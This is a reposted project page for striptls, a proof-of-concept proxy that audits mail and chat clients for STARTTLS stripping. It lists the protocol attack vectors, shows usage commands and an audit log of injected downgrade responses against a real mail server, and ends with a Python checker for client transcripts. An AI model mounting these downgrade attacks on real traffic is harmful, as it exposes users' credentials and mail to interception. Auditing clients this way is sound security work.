striptls: open-source auditing proxy project

Anonymous user, 2016-02-23

Technical information

Source repository
https://github.com/tintinweb/striptls
License
CC0

Project details

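STARTTLS is an extension to plaintext communication protocols. It provides a way to upgrade a plaintext connection to an encrypted connection (TLS or SSL) instead of using a separate port for encrypted communication.

striptls is a proof-of-concept implementation of STARTTLS stripping attacks. It supports the following vectors per protocol: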

SMTP

- SMTP.StripFromCapabilities - server response capability patch
- SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
- SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
- SMTP.StripWithTemporaryError
- SMTP.StripWithError
- SMTP.ProtocolDowngradeStripExtendedMode
- SMTP.InjectCommand

POP3

- POP3.StripFromCapabilities
- POP3.StripWithError
- POP3.UntrustedIntercept

IMAP

- IMAP.StripFromCapabilities
- IMAP.StripWithError
- IMAP.UntrustedIntercept
- IMAP.ProtocolDowngradeToV2

FTP

- FTP.StripFromCapabilities
- FTP.StripWithError
- FTP.UntrustedIntercept

NNTP

- NNTP.StripFromCapabilities
- NNTP.StripWithError
- NNTP.UntrustedIntercept

XMPP

- XMPP.StripFromCapabilities
- XMPP.StripInboundTLS
- XMPP.UntrustedIntercept

ACAP (untested)

- ACAP.StripFromCapabilities
- ACAP.StripWithError
- ACAP.UntrustedIntercept

IRC

- IRC.StripFromCapabilities
- IRC.StripWithError
- IRC.UntrustedIntercept
- IRC.StripWithNotRegistered
- IRC.StripCAPWithNotregistered
- IRC.StripWithSilentDrop

Results:

    [*] client: 127.0.0.1
        [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
        [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
        [           ] <class striptls.StripFromCapabilities at 0xffd316bc>
        [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
    [*] client: 192.168.139.1
        [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
        [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
        [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>

Example:

    #> python -m striptls --help    # from pip/setup.py
    #> python striptls --help       # from source / root folder
    Usage: striptls [options]

           example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25

    Options:
      -h, --help            show this help message and exit
      -v, --verbose         make lots of noise [default]
      -l LISTEN, --listen=LISTEN
                            listen ip:port [default: 0.0.0.0:<remote_port>]
      -r REMOTE, --remote=REMOTE
                            remote target ip:port to forward sessions to
      -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                            format assumed [default: server.pem]
      -x VECTORS, --vectors=VECTORS
                            Comma separated list of vectors. Use 'ALL' (default)
                            to select all vectors. Available vectors:
                            FTP.StripFromCapabilities, FTP.StripWithError,
                            FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                            IMAP.StripWithError, IMAP.UntrustedIntercept,
                            NNTP.StripFromCapabilities, NNTP.StripWithError,
                            NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                            POP3.StripWithError, POP3.UntrustedIntercept,
                            SMTP.ProtocolDowngradeStripExtendedMode,
                            SMTP.StripFromCapabilities, SMTP.StripWithError,
                            SMTP.StripWithInvalidResponseCode,
                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                            XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                            XMPP.UntrustedIntercept [default: ALL]

Installation:

1. Install from pip

    #> pip install striptls

2. Install from source

    #> setup.py install

Example:

                      inbound                    outbound
    [inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
      smtp-client                   striptls                    remote/target

local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25

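Audit mode:

Audit mode iterates over all protocol-specific cases and keeps track of clients that violate the STARTTLS protocol. Press Ctrl+C to abort the audit and print the results.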

    #> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
    2016-02-02 22:11:56,275 - INFO    - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:21  , proto:  FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:21  , proto:  FTP): <class striptls.StripWithError at 0xffd4635c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:21  , proto:  FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:143 , proto: IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:143 , proto: IMAP): <class striptls.StripWithError at 0xffd4629c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:143 , proto: IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:119 , proto: NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:119 , proto: NNTP): <class striptls.StripWithError at 0xffd4641c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:119 , proto: NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:110 , proto: POP3): <class striptls.StripWithError at 0xffd461dc>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:110 , proto: POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:25  , proto: SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
    2016-02-02 22:11:56,275 - DEBUG   - * added test (port:25  , proto: SMTP): <class striptls.StripWithError at 0xffd4614c>
    2016-02-02 22:11:56,276 - DEBUG   - * added test (port:25  , proto: SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
    2016-02-02 22:11:56,276 - DEBUG   - * added test (port:25  , proto: SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
    2016-02-02 22:11:56,276 - DEBUG   - * added test (port:25  , proto: SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
    2016-02-02 22:11:56,276 - DEBUG   - * added test (port:5222, proto: XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
    2016-02-02 22:11:56,276 - INFO    - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
    2016-02-02 22:12:08,477 - DEBUG   - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
    2016-02-02 22:12:08,530 - INFO    - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
    2016-02-02 22:12:08,530 - INFO    - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
    2016-02-02 22:12:08,805 - DEBUG   - <Session 0xffcf6e4cL> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
    2016-02-02 22:12:08,805 - DEBUG   - <RewriteDispatcher  - changed mangle: striptls.StripWithInvalidResponseCode new: True>
    2016-02-02 22:12:09,759 - DEBUG   - <Session 0xffcf6e4cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
    2016-02-02 22:12:09,850 - DEBUG   - <Session 0xffcf6e4cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    2016-02-02 22:12:09,851 - DEBUG   - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
    2016-02-02 22:12:09,867 - DEBUG   - <Session 0xffcf6e4cL> [client] => [server]          'STARTTLS\r\n'
    2016-02-02 22:12:09,867 - DEBUG   - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
    2016-02-02 22:12:09,867 - DEBUG   - <Session 0xffcf6e4cL> [client] => [server][mangled] None
    2016-02-02 22:12:09,883 - DEBUG   - <Session 0xffcf6e4cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
    2016-02-02 22:12:09,983 - DEBUG   - <Session 0xffcf6e4cL> [client] <= [server]          '530 Authentication required\r\n'
    2016-02-02 22:12:09,992 - DEBUG   - <Session 0xffcf6e4cL> [client] => [server]          'rset\r\n'
    2016-02-02 22:12:10,100 - DEBUG   - <Session 0xffcf6e4cL> [client] <= [server]          '250 OK\r\n'
    2016-02-02 22:12:10,116 - WARNING - <Session 0xffcf6e4cL> terminated.
    2016-02-02 22:12:13,056 - DEBUG   - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
    2016-02-02 22:12:13,056 - INFO    - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
    2016-02-02 22:12:13,057 - INFO    - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
    2016-02-02 22:12:13,241 - DEBUG   - <Session 0xffd0918cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
    2016-02-02 22:12:13,241 - DEBUG   - <RewriteDispatcher  - changed mangle: striptls.StripWithTemporaryError new: True>
    2016-02-02 22:12:14,197 - DEBUG   - <Session 0xffd0918cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
    2016-02-02 22:12:14,289 - DEBUG   - <Session 0xffd0918cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    2016-02-02 22:12:14,304 - DEBUG   - <Session 0xffd0918cL> [client] => [server]          'STARTTLS\r\n'
    2016-02-02 22:12:14,305 - DEBUG   - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
    2016-02-02 22:12:14,305 - DEBUG   - <Session 0xffd0918cL> [client] => [server][mangled] None
    2016-02-02 22:12:14,320 - DEBUG   - <Session 0xffd0918cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
    2016-02-02 22:12:14,411 - DEBUG   - <Session 0xffd0918cL> [client] <= [server]          '530 Authentication required\r\n'
    2016-02-02 22:12:14,415 - DEBUG   - <Session 0xffd0918cL> [client] => [server]          'rset\r\n'
    2016-02-02 22:12:14,520 - DEBUG   - <Session 0xffd0918cL> [client] <= [server]          '250 OK\r\n'
    2016-02-02 22:12:14,535 - WARNING - <Session 0xffd0918cL> terminated.
    2016-02-02 22:12:16,649 - DEBUG   - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
    2016-02-02 22:12:16,650 - INFO    - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
    2016-02-02 22:12:16,650 - INFO    - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
    2016-02-02 22:12:16,820 - DEBUG   - <Session 0xffd0926cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
    2016-02-02 22:12:16,820 - DEBUG   - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>
    2016-02-02 22:12:17,760 - DEBUG   - <Session 0xffd0926cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
    2016-02-02 22:12:17,849 - DEBUG   - <Session 0xffd0926cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    2016-02-02 22:12:17,849 - DEBUG   - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
    2016-02-02 22:12:17,871 - WARNING - <Session 0xffd0926cL> terminated.
    2016-02-02 22:12:20,071 - DEBUG   - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
    2016-02-02 22:12:20,072 - INFO    - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
    2016-02-02 22:12:20,072 - INFO    - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
    2016-02-02 22:12:20,239 - DEBUG   - <Session 0xffd0934cL> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
    2016-02-02 22:12:20,240 - DEBUG   - <RewriteDispatcher  - changed mangle: striptls.StripWithError new: True>
    2016-02-02 22:12:21,181 - DEBUG   - <Session 0xffd0934cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
    2016-02-02 22:12:21,269 - DEBUG   - <Session 0xffd0934cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    2016-02-02 22:12:21,280 - DEBUG   - <Session 0xffd0934cL> [client] => [server]          'STARTTLS\r\n'
    2016-02-02 22:12:21,281 - DEBUG   - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
    2016-02-02 22:12:21,281 - DEBUG   - <Session 0xffd0934cL> [client] => [server][mangled] None
    2016-02-02 22:12:21,289 - DEBUG   - <Session 0xffd0934cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
    2016-02-02 22:12:21,381 - DEBUG   - <Session 0xffd0934cL> [client] <= [server]          '530 Authentication required\r\n'
    2016-02-02 22:12:21,386 - DEBUG   - <Session 0xffd0934cL> [client] => [server]          'rset\r\n'
    2016-02-02 22:12:21,469 - DEBUG   - <Session 0xffd0934cL> [client] <= [server]          '250 OK\r\n'
    2016-02-02 22:12:21,485 - WARNING - <Session 0xffd0934cL> terminated.
    2016-02-02 22:12:23,665 - WARNING - Ctrl C - Stopping server
    2016-02-02 22:12:23,665 - INFO    -  -- audit results --
    2016-02-02 22:12:23,666 - INFO    - [*] client: 127.0.0.1
    2016-02-02 22:12:23,666 - INFO    -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
    2016-02-02 22:12:23,666 - INFO    -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
    2016-02-02 22:12:23,666 - INFO    -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>
    2016-02-02 22:12:23,666 - INFO    -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>

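Besides audit mode, striptls can also strip STARTTLS from the server's capabilities, invalidate the STARTTLS response, perform untrusted SSL interception (for clients that do not check whether the server's certificate is trusted), and keep an XMPP audit trace.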
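The audit verdicts come down to one question: did the client keep sending mail commands in cleartext after STARTTLS was stripped or refused? The Python check below is an added example, not striptls code; the function name, the transcript format and the sample sessions (with hypothetical host names) are constructed for illustration.

```python
import re

# Commands that carry credentials or mail content and must not precede TLS.
SENSITIVE = re.compile(r"^(AUTH|MAIL|RCPT|DATA)\b", re.IGNORECASE)
OFFER = re.compile(r"^250[ -]STARTTLS\b", re.IGNORECASE)

def audit_smtp_client(transcript):
    """Classify one SMTP session as observed in cleartext on the wire.

    transcript: list of (sender, line), sender is 'C' (client) or 'S' (server).
    Returns (vulnerable, reason).
    """
    offered = requested = awaiting_reply = False
    for sender, line in transcript:
        line = line.strip()
        if sender == "S":
            if OFFER.match(line):
                offered = True
            if awaiting_reply:
                awaiting_reply = False
                if line.startswith("220"):  # only 220 means "go ahead with TLS"
                    return (False, "upgraded to TLS")
        elif line.upper() == "STARTTLS":
            requested = awaiting_reply = True
        elif SENSITIVE.match(line):
            if requested:
                return (True, "plaintext after failed STARTTLS")
            if offered:
                return (True, "STARTTLS offered but never requested")
            return (True, "plaintext, STARTTLS not offered")
    return (False, "aborted before sending mail commands")

# Constructed sample sessions (hypothetical host names), modelled on the audit log.
GREETING = [("S", "220 mail.example.test ESMTP ready"), ("C", "EHLO client.example.test")]
CAPS = [("S", "250-mail.example.test Hello"), ("S", "250-AUTH LOGIN PLAIN"), ("S", "250 STARTTLS")]
INVALID_CODE = GREETING + CAPS + [("C", "STARTTLS"), ("S", "200 STRIPTLS"),
                                  ("C", "mail FROM:<a@b.com> size=10")]
TEMP_ERROR = GREETING + CAPS + [("C", "STARTTLS"),
                                ("S", "454 TLS not available due to temporary reason"),
                                ("C", "QUIT")]
STRIPPED = GREETING + [("S", "250-mail.example.test Hello"), ("S", "250 AUTH LOGIN PLAIN"),
                       ("C", "mail FROM:<a@b.com> size=10")]
UPGRADED = GREETING + CAPS + [("C", "STARTTLS"), ("S", "220 Ready to start TLS")]

if __name__ == "__main__":
    for name in ("INVALID_CODE", "TEMP_ERROR", "STRIPPED", "UPGRADED"):
        print(name, audit_smtp_client(globals()[name]))
```

A client that requires TLS should land in the "aborted" or "upgraded" outcome for every session; any `True` verdict means mail commands crossed the wire unencrypted.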

Introduction content from FreeBuf (FreeBuf.COM)
